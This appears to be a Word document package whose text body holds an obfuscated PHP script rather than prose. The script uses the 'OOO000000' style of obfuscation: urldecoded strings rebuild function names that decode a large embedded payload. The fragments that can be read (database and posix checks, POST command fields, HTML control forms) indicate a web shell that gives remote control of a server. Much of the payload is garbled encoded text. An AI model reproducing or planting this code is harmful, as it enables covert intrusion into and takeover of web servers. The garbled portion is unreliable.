
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="applicatio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docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+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w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8}; $_F=__FILE__;$_X='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∻ഊ␲昽∼昲湴⁣㉬㉲㵲㕤㸠但䘠㰯昲湴㸢㬍ਤ渲渵㴢㱦㉮琠挲氲爽⌰䘰㸠乏久‼⽦㉮琾∻†‍਴昨昳湣琴㉮張破獴猨❣㍲江瘵牳㐲渧⤩ഊ††④㍲氽␲渻ഊ㕬猵ഊ††④㍲氽␲昻ഊ㑦⡦㍮捴㐲湟㕸㑳瑳⠧浹獱江朵瑟捬㐵湴弴湦㈧⤩ഊ††⑭祳煬㴤㉮㬍ਠ㕬猵ഊ††⑭祳煬㴤㉦㬠††‍਴昨昳湣琴㉮張破獴猨❭獳煬彣㉮渵捴✩⤍ਠ†․浳獱氽␲渻ഊ㕬猵ഊ†․浳獱氽␲昻‍ਉऍ਴昨昳湣琴㉮張破獴猨❰束挲湮㕣琧⤩ഊ††⑰朽␲渻ഊ㕬猵ഊ†․灧㴤㉦㬠† ऍ਴昨昳湣琴㉮張破獴猨✲挴彣㉮渵捴✩⤍ਠ†␲爽␲渻ഊ㕬猵ഊ†․㉲㴤㉦㬍਴昨䀴渴彧㕴⠧搴猱扬㕟昳湣琴㉮猧⤩ഊ†⑤㑳昳渽䀴渴彧㕴⠧搴猱扬㕟昳湣琴㉮猧⤻ഊ㕬猵ഊ⑤㑳昳渽≁汬⁆㍮捴㐲湳⁅渱扬㔢㬍਴昨䀴渴彧㕴⠧猱昵彭㉤㔧⤩ഊ⑳ㅦ㕟洲搵猽∼昲湴⁣㉬㉲㵲㕤㹏丼⽦㉮琾∻ഊ㕬猵ഊ⑳ㅦ㕟洲搵猽∼昲湴⁣㉬㉲㴣う〠㹏䙆㰯昲湴㸢㬍਴昨䀴渴彧㕴⠧㉰㕮形ㅳ㕤㑲✩⤍ਤ㉰㕮形㵀㑮㑟朵琨✲瀵湟戱猵搴爧⤻ഊ††㕬猵ഊ†␲瀵湟戽⑮㉮㔻ഊ††ഊഊ㑦⡀㑮㑟朵琨❳ㅦ㕟洲搵張砵损搴爧⤩ഊ⑳ㅦ㕟㕸㔽䀴渴彧㕴⠧猱昵彭㉤㕟㕸㕣彤㑲✩㬍ਠ†‵汳㔍ਤ猱昵張砵㴤渲渵㬍਴昨䀴渴彧㕴⠧猱昵彭㉤㕟㑮捬㍤㕟搴爧⤩ഊ†․猱昵弴湣氳搵㵀㑮㑟朵琨❳ㅦ㕟洲搵弴湣氳搵彤㑲✩㬠ഊ㕬猵ഊ․猱昵弴湣氳搵㴤渲渵㬍਴昨Ⅶ㍮捴㐲湟㕸㑳瑳⠧瀲猴硟朵琵朴搧⤩‍੻ഊउ␳猵爠㴠䁧㕴彣㍲爵湴弳猵爨⤻ഊउ␳㑤‽⁀朵瑭礳㑤⠩㬍ਉत朴搠㴠䁧㕴浹朴搨⤻ഊउ⑧爲㍰‽•㼢㬍੽‵汳㔠ഊ笍ਉत㌴搠㴠䁰㉳㑸彧㕴灷㌴搨瀲猴硟朵琵㌴搨⤩㬍ਉत朴搠㴠䁰㉳㑸彧㕴杲朴搨瀲猴硟朵琵朴搨⤩㬍ਉत㍳㕲‽․㌴摛❮ㅭ㔧崻ഊउ␳㑤‽․㌴摛✳㑤❝㬍ਉत杲㈳瀠㴠⑧㑤嬧渱洵❝㬍ਉत朴搠㴠⑧㑤嬧朴搧崻ഊॽഊഊഊ††․捷摟水湫猠㴠✧㬍ਉ⑰ㅴ栠㴠㕸灬㉤㔨∯∬․䝌佂䅌卛❣睤❝⤻ഊत渽挲㍮琨⑰ㅴ栩㬍ਉ昲爨␴㴰㬠␴㰤渭㘻․㐫⬩⁻ഊउ④睤彬㑮歳‮㴠∼ㄠ⁨爵昽✣✠㉮捬㑣欽❧⡜≆㑬㕳䴱湜∬尢∻ഊउ昲爨⑪㴰㬠⑪㰽␴㬠⑪⬫⤍ਉउ④睤彬㑮歳‮㴠⑰ㅴ桛⑪崮✯✻ഊउ④睤彬㑮歳‮㴠≜∩✾∮⑰ㅴ桛␴崮∯㰯ㄾ∻ഊॽഊഊ⑤爴瘵猠㴠∢㬍੦㉲㔱捨⡲ㅮ朵⠧挧Ⱗ稧⤠ㅳ․摲㑶㔩ഊ㑦⠴獟搴爨⑤爴瘵⸧㩜尧⤩ഊ⑤爴瘵猠⸽‧㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❆㑬㕳䴱湜✬尧✮⑤爴瘵⸧㨯尧⤢㹛‧⸤摲㑶㔮✠崼⼱㸠✻ഊഊഊഊഊഊ‵捨㈠✼⅄佃呙偅⁨瑭氠偕䉌䥃•⴯⽗潃⼯䑔䐠塈呍䰠㘮〠呲ㅮ猴琴㉮ㅬ⼯䕎∠≨瑴瀺⼯睷眮睯⸲牧⽔刯硨瑭氶⽄呄⽸桴浬㘭瑲ㅮ猴琴㉮ㅬ⹤瑤∾ഊ㱨瑭氠硭汮猽≨瑴瀺⼯睷眮睯⸲牧⼶㤹㤯硨瑭氢㸍਼栵ㅤ㸍਼洵琱⁨瑴瀭㕱㌴瘽≃㉮琵湴ⵔ祰㔢⁣㉮琵湴㴢琵硴⽨瑭氻⁣栱牳㕴㴳瑦ⴸ∠⼾ഊ㱬㑮欠桲㕦㴢桴瑰㨯⽷睷⹭ㅤ獰㉴⹮㕴⽦ㅶ㑣㉮⸴挲∠爵氽∴挲渢⁴祰㔽∴洱朵⽸ⴴ挲渢⼾ഊ㱴㑴氵㹍ㅤ獰㉴⁓㕣㍲㑴礠吵ㅭ⁓栵汬㰯琴瑬㔾ഊ㱳瑹氵⁴祰㔽≴㕸琯捳猢㸍਼ℭⴍਮ睨㉬㔠笍ਉ戱捫杲㈳湤ⵣ㉬㉲㨠⍃䍃㬍ਉ栵㑧桴㨱㍴㈻ഊॷ㑤瑨㨠ㄳ琲㬍ਉ洱牧㑮⵴㉰㨠㘰灸㬍ਉ洱牧㑮⵲㑧桴㨠㘰灸㬍ਉ洱牧㑮⵬㕦琺‶ば砻ഊ納ਮ栵ㅤ㕲⁻ഊ२㔴杨琺‱㍴㈻ഊॷ㑤瑨㨠ㄳ琲㬍ਉ戲牤㕲㨠㝰砠猲水搠⍃䍃㬍ਉ挲氲爺‣㤹㤻ഊ०㉮琭猴稵㨠㙡灸㬍ਉ昲湴ⵦㅭ㑬示⁖㕲搱渱Ⱐ䜵渵瘱Ⱐ猱湳⵳㕲㑦㬍ਉ戱捫杲㈳湤ⵣ㉬㉲㨠⌰〰㬍੽ഊ⹨㔱搵爠ㄠ筣㉬㉲㨣う〻⁴㕸琭搵挲爱琴㉮㩮㉮㔻納ੳ瀱渠笍ਉ昲湴⵷㔴杨琺⁢㉬搵爻ഊॣ㉬㉲㨠⍆䙆㬍੽ഊ⍭㔳湬㑳琠笍ਉ昲湴ⵦㅭ㑬示⁖㕲搱渱Ⱐ䜵渵瘱Ⱐ猱湳⵳㕲㑦㬍ਉ挲氲爺‣䙆䘻ഊॢㅣ歧爲㍮搭挲氲爺‣〰〻ഊॷ㑤瑨㨠ㄳ琲㬍ਉ戲牤㕲⵲㑧桴⵷㑤瑨㨠㝰砻ഊॢ㉲搵爭氵晴⵷㑤瑨㨠㝰砻ഊॢ㉲搵爭琲瀭獴祬㔺⁳㉬㑤㬍ਉ戲牤㕲⵲㑧桴⵳瑹氵㨠猲水搻ഊॢ㉲搵爭戲瑴㉭⵳瑹氵㨠猲水搻ഊॢ㉲搵爭氵晴⵳瑹氵㨠猲水搻ഊॢ㉲搵爭琲瀭挲氲爺‣䍃䌻ഊॢ㉲搵爭爴杨琭挲氲爺‣䍃䌻ഊॢ㉲搵爭戲瑴㉭ⵣ㉬㉲㨠⍃䍃㬍ਉ戲牤㕲⵬㕦琭挲氲爺‣䍃䌻ഊ२㔴杨琺‱㍴㈻ഊ०㉮琭猴稵㨠㙡灸㬍ਉ昲湴⵷㔴杨琺⁢㉬搻ഊॢ㉲搵爭琲瀭眴摴栺‰灸㬍੽ഊ†⹷栲氵‣洵㍮水獴″氠笍ਉ瀱摤㑮札琲瀺⁩灸㬍ਉ瀱摤㑮札爴杨琺⁩灸㬍ਉ瀱摤㑮札戲瑴㉭㨠㝰砻ഊ॰ㅤ搴湧⵬㕦琺⁡灸㬍ਉ琵硴ⴱ水杮㩣㕮琵爻ഊ६㑳琭獴祬㔭瑹瀵㨠渲渵㬍ਉ洱牧㑮㨠ば砻ഊ納ਠ‮睨㉬㔠⍭㔳湬㑳琠水⁻ഊ७ㅲ朴渺‰灸㬍ਉ瀱摤㑮机‰灸㬍ਉ搴獰氱示‴湬㑮㔻ഊ納ਠ‮睨㉬㔠⍭㔳湬㑳琠ㄠ笍ਠ†⁦㉮琭昱洴汹㨠ㅲ㐱氬⁳ㅮ猭猵爴昻ഊ०㉮琭猴稵㨠㙵灸㬍ਉ琵硴ⵤ㕣㉲ㅴ㐲渺渲渵㬍ਉ昲湴⵷㔴杨琺⁢㉬搻ഊॣ㉬㉲㨠⍦晦㬍ਉ捬㔱爺⁢㉴栻ഊॷ㑤瑨㨠㘰ば砻ഊ७ㅲ朴渭爴杨琺‭数砻ഊ॰ㅤ搴湧⵴㉰㨠潰砻ഊ॰ㅤ搴湧⵲㑧桴㨠㙩灸㬍ਉ瀱摤㑮札戲瑴㉭㨠潰砻ഊ॰ㅤ搴湧⵬㕦琺‶楰砻ഊॢ㉲搵爭爴杨琭眴摴栺‶灸㬍ਉ戲牤㕲⵲㑧桴⵳瑹氵㨠猲水搻ഊॢ㉲搵爭爴杨琭挲氲爺‣䙆䘻ഊ納ਠ‮睨㉬㔠⍭㔳湬㑳琠ㄺ栲瘵爠笍ਉ挲氲爺‣〰〻ഊॢㅣ歧爲㍮携‣晦昻ഊ納਍ਮ昲㉴⁻ഊ०㉮琭昱洴汹㨠嘵牤ㅮㄬ⁇㕮㕶ㄬ⁳ㅮ猭猵爴昻ഊॢㅣ歧爲㍮搭挲氲爺‣〰〻ഊ७ㅲ朴渺‰灸㬍ਉ瀱摤㑮机‰灸㬍ਉ眴摴栺‶〰┻ഊॴ㕸琭ㅬ㑧渺⁣㕮琵爻ഊ०㉮琭猴稵㨠㙡灸㬍ਉ挲氲爺‣䍃䌻ഊॢ㉲搵爭爴杨琭眴摴栺‷灸㬍ਉ戲牤㕲⵬㕦琭眴摴栺‷灸㬍ਠ†⁢㉲搵爭戲瑴㉭⵷㑤瑨㨠㝰砻ഊ††戲牤㕲ⵢ㉴琲洭獴祬㔺⁳㉬㑤㬍ਠ†⁢㉲搵爭爴杨琭獴祬㔺⁳㉬㑤㬍ਠ†⁢㉲搵爭爴杨琭獴祬㔺⁳㉬㑤㬍ਉ戲牤㕲⵬㕦琭獴祬㔺⁳㉬㑤㬍ਉ戲牤㕲⵴㉰ⵣ㉬㉲㨠⍃䍃㬍ਉ戲牤㕲⵲㑧桴ⵣ㉬㉲㨠⍃䍃㬍ਉ戲牤㕲ⵢ㉴琲洭挲氲爺‣䍃䌻ഊॢ㉲搵爭氵晴ⵣ㉬㉲㨠⍃䍃㬍੽✻ഊ㑦⠴獟睲㑴ㅢ氵⠤䝌佂䅌卛❣睤❝⤩ഊ⁻ഊ††㕣栲•⹦㈲瑴ㅢ氵⁻ഊ††眴摴栺⁯〰灸㬍ਠ†⁦㉮琭眵㑧桴㨠戲汤㬍ਠ†⁽∻納ਠ†‵汳㔍ਠ†⁻ഊ†††‵捨㈠∮昲㉴琱扬㔠笍ਠ†⁷㑤瑨㨠漰ば砻ഊ††昲湴⵷㔴杨琺⁢㉬搻ഊ††戱捫杲㈳湤ⵣ㉬㉲㩲㕤㬍ਠ†⁽ഊ††⹤㑲⁻ഊ†††戱捫杲㈳湤ⵣ㉬㉲㩲㕤㬠‍ਠ†⁽ഊ††∻‍ਠ†⁽††ഊ‵捨㈠✮洱㑮⁴桻琵硴ⴱ水杮㩬㕦琻納ਠ⹭ㄴ渠ㅻ挲氲爺‣䙆䘻納ਠ⹭ㄴ渠瑲㩨㉶㕲筢ㅣ歧爲㍮搭挲氲爺爵搻納ਠ⹭氶笠戲牤㕲㨶灸⁳㉬㑤‣畵画瀱摤㑮机楰砻洱牧㑮㨰㬲瘵牦氲眺‱㍴㈻⁽ഊ‮戴朱爵ㅻ⁷㑤瑨㨹㤥㬠栵㑧桴㩯〰灸㬠素†ഊ†㰯獴祬㔾ഊഊ✻ഊഊ㕣栲•㱳捲㑰琾ഊ††瘱爠损‽‧∠⸠桴浬獰㕣㐱汣栱牳⠤䝌佂䅌卛❣睤❝⤠⸠∧㬍ਠ†⁶ㅲ‱张㴠✢‮⁨瑭汳瀵挴ㅬ捨ㅲ猨䀤彐体呛✱❝⤠⸢✍ਠ†⁶ㅲ⁣栱牳㕴张㴠✢‮⁨瑭汳瀵挴ㅬ捨ㅲ猨䀤彐体呛❣栱牳㕴❝⤠⸢✻ഊ††瘱爠瀶张㴠✢‮ ⡳瑲瀲猨䀤彐体呛❰㘧崬≜渢⤡㴽昱汳㔩㼧✺桴浬獰㕣㐱汣栱牳⠤彐体呛❰㘧崬䕎呟兕佔䕓⤩‮∧㬍ਠ†⁶ㅲ⁰慟‽‧∠⸠⠨獴牰㉳⡀⑟偏協嬧灡❝Ⱒ屮∩ℽ㵦ㅬ猵⤿✧㩨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧灡❝ⱅ乔彑問呅匩⤠⸢✻ഊ††瘱爠灯张㴠✢‮ ⡳瑲瀲猨䀤彐体呛❰漧崬≜渢⤡㴽昱汳㔩㼧✺桴浬獰㕣㐱汣栱牳⠤彐体呛❰漧崬䕎呟兕佔䕓⤩‮∧㬍ਠ†⁶ㅲ⁤‽⁤㉣㍭㕮琻ഊ०㍮捴㐲渠猵琨ㄬ挬瀶Ɒ愬灯Ᵽ栱牳㕴⤠笍ਉऴ昨ㄡ㵮㍬氩搮浦⸱⹶ㅬ㌵㴱㬵汳㔠搮浦⸱⹶ㅬ㌵㴱弻ഊउ㑦⡣ℽ渳汬⥤⹭昮挮瘱氳㔽挻㕬猵⁤⹭昮挮瘱氳㔽损㬍ਉऴ昨瀶ℽ渳汬⥤⹭昮瀶⹶ㅬ㌵㵰㘻㕬猵⁤⹭昮瀶⹶ㅬ㌵㵰㙟㬍ਉऴ昨灡ℽ渳汬⥤⹭昮灡⹶ㅬ㌵㵰愻㕬猵⁤⹭昮灡⹶ㅬ㌵㵰慟㬍ਉऴ昨灯ℽ渳汬⥤⹭昮灯⹶ㅬ㌵㵰漻㕬猵⁤⹭昮灯⹶ㅬ㌵㵰潟㬍ਉऴ昨捨ㅲ猵琡㵮㍬氩搮浦⹣栱牳㕴⹶ㅬ㌵㵣栱牳㕴㬵汳㔠搮浦⹣栱牳㕴⹶ㅬ㌵㵣栱牳㕴弻ഊॽഊ०㍮捴㐲渠木ㄬ挬瀶Ɒ愬灯Ᵽ栱牳㕴⤠笍ਉॳ㕴⠱ⱣⱰ㘬灡Ɒ漬捨ㅲ猵琩㬍ਉ।⹭昮猳扭㑴⠩㬍ਉ紼⽳捲㑰琾∻ഊഊ††ഊव捨㈠✍਼⽨㔱搾ഊഊ㱢㉤礠执挲氲爽∣〰〰〰∠⁬㕦瑭ㅲ朴渽∰∠琲灭ㅲ朴渽∰∠洱牧㑮眴摴栽∰∠洱牧㑮栵㑧桴㴢〢㸍਼搴瘠捬ㅳ猽≷栲氵∾ഊ㱦㉲洠洵瑨㉤㵰㉳琠渱洵㵭映獴祬㔽≤㑳灬ㅹ㩮㉮㔻∾ഊ㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽ㄾഊ㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽挾ഊ㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽瀶㸍਼㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵰愾ഊ㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽灯㸍਼㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵣栱牳㕴㸍਼⽦㉲派ഊ†㱤㑶⁣氱獳㴢栵ㅤ㕲∾㱴ㅢ氵⁷㑤瑨㴢㘰〥∠戲牤㕲㴢〢†ㅬ㑧渽≬㑦琢㸍ਠ‼瑲㸍ਠ†‼瑤⁷㑤瑨㴢漥∾㱳瀱渾啮ㅭ㔺㰯獰ㅮ㸼⽴搾ഊ††㱴搠挲汳瀱渽≡∾✮猳扳瑲⡀灨灟㍮ㅭ㔨⤬‰Ⱐ㙡〩⸧㰯瑤㸍ਠ†‼⽴爾ഊ†㱴爾ഊ††㱴搾㱳瀱渾啳㕲㨼⽳瀱渾㰯瑤㸍ਠ†‼瑤㸧⸠␳㑤‮‧⁛‧‮․㍳㕲‮‧⁝‼獰ㅮ㸠†䝲㈳瀺‼⽳瀱渾✠⸠⑧㑤‮‧⁛‧‮․杲㈳瀠⸠✠崠㰯瑤㸍ਠ†‼瑤⁷㑤瑨㴢㙵┢⁲㉷獰ㅮ㴢㠢㸼㑭朠ㅬ琽∢⁳牣㴢搱琱㨴洱朵⽪瀵朻戱猵敵Ⱟ㥪⽵䅁兓歚䩒杁䉁允䅁允䉁䅄⽡睃䕁䉅䵄儸乃硅偄朸呅桅噇㑳捇桧奇橕测䈸牐穤䍑呵潐䑴䙔济啒啬㕓穳㡖湚塘浤煢潂癑㙎敧潬獧济瑢慳䉅桍呇档ㅍ硷捍慴䡐䕤爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱慴爱⼯䅁䉅䥁䤸䅪睍䉅允䍅充䑅先⽸䅇㑁䅁䉂充䉁充䉁允䅁䅁䅁䅁䅁光䑂䅕䝂睧䩃杳允䅉䉁睍䍂䅍䙂兑䕁䅁䉦充䍁睁䕅兕卉呆䉂桎剙兣㑣剑祧婇桃䍎䍳捅噕瑈睊䑎㑣㉉䩃桙塇䉫ㅊ卙湋䍫煎䑕慎穧楏歎䕒啚䡓䕬䭕㙒噖汤套噰橚䝖浚慨瀱湎つ塚漵䡬敧畓䙨㈵䤴奱卫楓噬瀵奭婱㐲敓汰焵㉱ㅱ祳㝓㙴爵申扲䍷㡔䙸獦䥹捲匰㥔嘶瑦奡摲桵㍐歩㕢湥佮焸晌稹偘愹⽪椫杅䅁睅䉁充䉁充䉁允䅁䅁䅁䅅䍁睑䙂杣䥃儲䱅允䍁光䕂䅍䕂睕䕂䅁䉁湣䅁光䑅兑䙉呅䝅歆剂慆硅祉祧內啑灇桳捅䩉穎匸䉖㑣瑅䭆㑑ふ単硆硧婇㑙湋䍫煎呙潏䑫救げ䙒此䥓啰呖䙖坖㙨婗济歚坚渱䝬煣潒㙤湤电塱䍧畓䙨㈵䤴奱卫楓噬瀵奭婱㐲敓汰焵㉱ㅱ祳㝓㙴爵申扲䍷㡔䙸獦䥹捲匰㥔嘶瑦奡摲㑵⭔汩㍦㉥㕲礸⽔㘹癦甫晲⽡杁䵁睅䅁桅䑅允⽁住瑌䩲歆瑡㙒坣敮䭚噋㑧坶㝉⽥扦灗扲⭒根ㅘ奐㝉䠯偢㥋塴⽉昶汎㝆浐睵稲䝍畇㕸䙚祸㑘兴噶䥪扷楣樷獳娯䵖卸捃⼱㉺䱱㙬瑊晌浘䑖ぷ浰䭥䱪䩐奙䕁䡺湆啕䝡倫㡦礲䅁獦㥵⽬兂䥌扐六杂䝴婁䵧婆䅅䉇䑑䈵樰祗卍倳啚楷ㅹ摗䭚橋癇䱈晡呎⽦卬㝚䝦㙱䥄博樰婣浫攸啎奭䱚奈桡㝉稳橈甶䑸捄呡煁⭈扳䅫乇昲ㄱ硕䝈瑕婣㡌睓䝏兙奖げ歰䭥久㝱楳教䅌䩃佩伱楋潸䡮畬⬯奴㙫捷楏坕㔹䨷䑪㍢䡓㍋坲佸䩂啪㥔䜸剉湡摘䭧㍃䅄⭎㕨杭㥕㄰橭婄⬸扥㙥䨳䴲䅫栯㙱ぁ塬攰䅔䱑䉑㍷䔳橧搳汁䜷䝍剉偙噩㡴圵呖晶䵤卍礵穁乷㍒坣㝡䱰㝭湘䥤奕歉楔硊⽹䕂⼳䍶婷漸么呓⭅猱搯硩刯樯佳煶硳畣吸婚牍楨祦晘攴汌畓㈷浸塃㥺獑啄䵢硇刹湪䡱睲き䠶丱剺䵮⭳扥㙥䈳䴲䅫术㙱ぁ填㉁浗权橦昸䅈稫䄲䅯䥶㥕渫敋畊扮歖倴奥灍祸婦㡦䌯儶湕慎ㅗ楰噸湕䙍䑬晅瘯䥑堯捲㘸䰯䑏㑮㡊偰漯䡬䠫倸䅏獥癸獵捔㡚婲䵩桹晦塥㑬䱵匲㝭硘䌹穳兕桭䡵欫㝃昵癒睘唶灈体⽥硶牘㉇畹权卄⽁䙱ぁ塬㉁浗权橦昸晘畃杄扨楧樯睂て祲杬㌵剖⭊橥歺䱆氯砸䰹䑗摔夶灢浬塇摑啷佖㡓⼸桂昹祶塷瘸䅄伴游䩎灰⼰䩐砯湕噶橏䡅⽇坱祏奣湯㘫瑔䱙煏楳噸卯佸䉓㡧䵔硈⽱㉶㥵噥佄〳払橭楦㥙漶爰䑣婑䉊䈯牖㉁癌兂䵴䅆䜫⽵⭶睆䅇潂⽱䥶㥷晹牧游剩乘畡偱扭剙獶⭐杦儶湕慎䬵楰噸湗䙍䝣牵氯睃內瘸䄳噥⭆⽨湒匫䕧獲㥢㕐祯啫䑰㑲煕⭚潉焰㕦啴橖䱣橮捄㥋礹橉椯煲瘳䠹灡潱⽩唵睫健焰祡渴䝯噁䝖浉㝵硗䱷歭ㅱ欰䈸卑搲塺㤱偱吷樹歺䨶䡕浶灬奪ㄴ㥂塘刲煭片獉㡰填杌䕳灂䉩穭琴确歐㝦湑䅱眳牁㡣啁坬奄煄兂䥳㐫桊䙁䙋敦䵡甯㔷男啁ㅆ灱䕉桖婇䭬兂ひ湮匳㥄歱畦浤ご⽁串坯⽐吹䭺㥪䥹⭲午䩱搳橨汬楈瑓摃呑畵㕓婣䝶坭体挫㙙晖䩇祰祅晘㝒啊塊偰呗䑬㙇煔㍣㝱乵扡楍灇䉪䅆㕨周祒獢剖歔敢ㅊ丳歬䝩剷䙺唶䭪樲橋瑖楅塨套㈯睃坑⽏獐ㅺ佘敺䥘㝂ㄯ睄偉晭ㅐㅺ䑥穉瑷ㅊㅐ䝈摍娷䄶桌䙔呎汖歹含睲䰫畦穱晲捹湕婬ㅺ灳噮䝈橇䅔硘婑牏㉴呓湐浉㝏硪ㅎ填啮䥺呱噗瑅婖ㄷ㐷䥴晙扢⽮氫灲偡獺䑥積䉰㥳呧剣⽕の坭歎头呌祥䙚㝒㍕椷畎奶䙔乬噫䰯奖汪㝲普唯坩樹煺䄶估匶療䌲睏倲ㄹ䍬偮档慨䱭噹灌獄歋㍂浴卸浒⽤㉁噑䝙䅌礱䅌䭡祈牮乁䑺婉券灏ㅁ䭕㑇乹牤剑䉲敒⽸㝴⽶噹㘯㑏䡆㜲瘶杣兇歸牣慉⼸䅖爹䭵灢湚䡙摕橍塸丯硩砯㜶搫䍯婲卯䥲启樶㐯睂ざ灐畭捖晵慓㙇椴南⼸䅲甯牕卡䱨㌱㙣呏硢䉒㉌捩癸䥐㥌桎㕲术杏㑬獙歮潡⭴摨煍㉁汴⼹娫䙁䘶䭁䩬㉁㉘⽁偸㡈敃杄儰樯橯扥㙹㘯㑏䡆戲瘶杣先灓奵㝭硈⽱㘫杲㑬㍤此栶单奶㑢⽪な⽯焷獆㡔丱坩䘱⼸㕳堫敋㙮㡔佇瘸䅇匶䈴南⼫癪⭴呐畓畢浴塃摧啷佤㡓夫け㕴㕰术杚癓慍䭔⽗丹ㄷ呕婓䅬琯㥚⭆䅆㙋䅊氲䄲敧景⭐奕䄱佬䑆浄敫㙹噶㑏䑆戲㌶㑣奤煔䡈捡䤯㥗瘰爴氳摳摨㙉娴⭊瘸䅪な⽁乥㍯䉦䕺卬㍒坶⽁䉥硦㜲牗晸䵵焯硫瑑奫汶⽁䬫健㙍⽨䱨㌱㙣䩡䉔䅩穸䨯睁晍䘵灧⽧婶卡䵏启坈收慭㉹歂䱢⽁佳⽃权整䅅礰䅕䰯睄甫偷䙁䝪灌条硔㍰楲汲灯㍣佋坱娵牁畷㝕湳䍯丵䱭䩓偓㍋㕩慒慈㙊刴⭊瘸䅪な䡦摘晧牯婰卯䥲启樶㐯潒坬呵浣噦畡匶䈴南⽅祅㥍㙅爸灣倴丱㍎效坆䥢佤㡓䐯卙含䘵牧㘷㍰癓慍䭘⽗丹ㄷ䑕婑䉊䅦潧㉁癌兂䵴䅆䌯佢杪ぁ㉁匰㍗瑰乹橣䍍䕖䴲䭓獒佃浲䵴瑱のㅉ䍳癙㉸⭲剂摗欯㑪唰㕷㑌整䕳砫䥈㑘ㅳ剸㝭獯桉獰啅㌲⼸䅵卓启渴䭘㙓偣牡卍⽕乒㔹偋甫灲㕮呕䘲ㅒ㑫佴牥坊䙘祤睁睏愱捱ㅚ䕥䵚ㅫ⼸䄱启㠫砯佳⽙䰳婦嘲㑈噣䡂杉倶㈹杧均卌䍥⽣䅁䍄䥈牗昶卌䱖䙄橲㡩啪㝐杵畎䍷此㝪㥫橊癌㍗畬䉣䕁䡉䉲灨䉒噫ㅱ䭓䄫塉乡硷协杈䙗䵚楓景堯䭧䉦䱑摆昸煁䩒䥒慢⽶浧䉔捍煮䅙昸䅁ㅁ䭌獘女㕰㉁䉸穑䄳㥶坧䉑穅杚㉁㍉㑧䅅婐癑䉋猱䠫䅕䅑穡敃前捚䤯湑䉆捹乩牁䡁䉷䉑䉂楪景橑䅩坤流潈浧䍵㑪㉒浧䍖啑㥖㉁橮元䥱剮ㅑ噊㥄愲䅱卹乶䥺〹䭁䤯䵢⬸ㅁ䡸汮捄挱䅌ㄲ癰兂䭉ぐ䉕挰䅚㥺䡩啺䱡㝕䅒㥱䅅㉁摈㤹晲兂晗权娱䅇塈⭳㐫㈯湑䉑㍦㤵⼶乁䕖䅄畦㥙瘶㉁癌兂䵬䅄䱮㝪⽁偁晩ぁ婳渫獐㘲䅢兂䱢⽥稸䭁䱱ぁ卲兂制䐯橵稷䍧䌳ㅁ䔲䅣湯㘫瑁䘹㕴䅅礰䅍㍐癸晕智㉁㉘倸䅲漫瀲䄴㉁晄⽁䬶ㅁ䱹ぁ呌允祵⭵⼸䅷䠫摁䝢䨹㥶牑䅡权坄⽁䙮畕䅘嘲䅭坧䍪煈⭶⽁䄲䅲䝧䉋䅈䨹㥦牑䉦坧䍚ㅁ䝘䡯當煐椰䅕䱮⽁䘷⽁䙎䅅噁䑵昸䅗牑䉦坧䍖ㅁ䝘䡯䠯睃䄯睁敁䵡吷㝦坧䉴䅅獈⭳⽃权整䅅礰䅕摑倷⽈獋䅋漱杂䭁䙕留䝧䌫湉祏汁䕥㑧䍋楤噤䵫晋剮㡥䅋噸桰坙摃捩㉁㐲䅦䝤牱ㅁ䱥㔶䅅煤ㅁ䤷杪祯併䑬制攰䅚㠲硉晲允祧䍓䕨婁吰㉁癌兂䭏䉫㡕䅚㙡畫湙爰敕䅑ぁ䜱䅆䉉㉁捊塈剳啁䱩㡶㤸ぁ䵚㑸祸穑䅱㍖敕䅏㠰⽯嘯䭧䄸〯睂㙦礲䅕塄橰杕䅌㥰欹ㅁ䥯挳捭杂睭奁䅧䡈煋䅄穔⽤堸煁䑺启摘㡱䅆⬰偡睋䅇瑋㝄䉙甲䅚兂⼯娢 